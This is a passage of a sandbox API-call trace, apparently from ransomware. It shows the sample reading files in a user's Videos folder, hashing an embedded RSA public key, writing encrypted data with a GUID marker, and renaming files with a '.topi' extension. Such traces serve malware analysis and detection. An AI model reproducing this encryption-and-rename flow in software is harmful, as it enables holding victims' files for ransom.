(HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4df0 | out: hHeap=0x680000) returned 1 [0097.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.350] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e20 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e08 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dd8 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb458 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.352] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.352] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.352] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.352] WriteFile (in: hFile=0x6a8, lpBuffer=0x3189d50*, nNumberOfBytesToWrite=0x9db, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x3189d50*, lpNumberOfBytesWritten=0x9ccfb14*=0x9db, lpOverlapped=0x0) returned 1 [0097.352] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0097.352] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.352] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.352] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.352] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.352] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.352] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.352] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.352] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.352] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.353] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.353] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.353] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.353] CloseHandle (hObject=0x6a8) returned 1 [0097.354] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311eae0 [0097.354] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0097.354] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eae0 | out: hHeap=0x680000) returned 1 [0097.354] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\LAb0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\lab0.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\LAb0.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\lab0.avi.topi")) returned 1 [0097.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.355] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.356] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca194d00, ftCreationTime.dwHighDateTime=0x1d5beed, ftLastAccessTime.dwLowDateTime=0x35f158a0, ftLastAccessTime.dwHighDateTime=0x1d5bca6, ftLastWriteTime.dwLowDateTime=0x35f158a0, ftLastWriteTime.dwHighDateTime=0x1d5bca6, nFileSizeHigh=0x0, nFileSizeLow=0x164f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oh26YTG5TwCV3.swf", cAlternateFileName="OH26YT~1.SWF")) returned 1 [0097.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ee58 [0097.356] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0097.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ee58 | out: hHeap=0x680000) returned 1 [0097.356] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\oh26YTG5TwCV3.swf") returned=".swf" [0097.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\oh26YTG5TwCV3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\oh26ytg5twcv3.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.356] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=91380) returned 1 [0097.356] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.359] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x164ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.359] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.360] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.360] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.360] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x164f4, lpOverlapped=0x0) returned 1 [0097.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.361] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.361] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.362] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.362] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.362] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.362] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.362] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.362] GetLastError () returned 0x0 [0097.362] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.362] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.362] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.362] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.362] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.362] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.362] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.362] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.362] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.362] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x164f0) returned 0x9a06a00 [0097.363] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb458 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dc0 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb4a0 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4dd8 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e08 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e20 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.363] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e08 | out: hHeap=0x680000) returned 1 [0097.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e20 | out: hHeap=0x680000) returned 1 [0097.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e20 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4e08 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.363] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.364] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e20 | out: hHeap=0x680000) returned 1 [0097.364] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e08 | out: hHeap=0x680000) returned 1 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.375] GetCurrentThreadId () returned 0x8c4 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9890 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.375] GetCurrentThreadId () returned 0x8c4 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.375] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.375] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e08 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e20 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4df0 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.376] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.376] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.376] 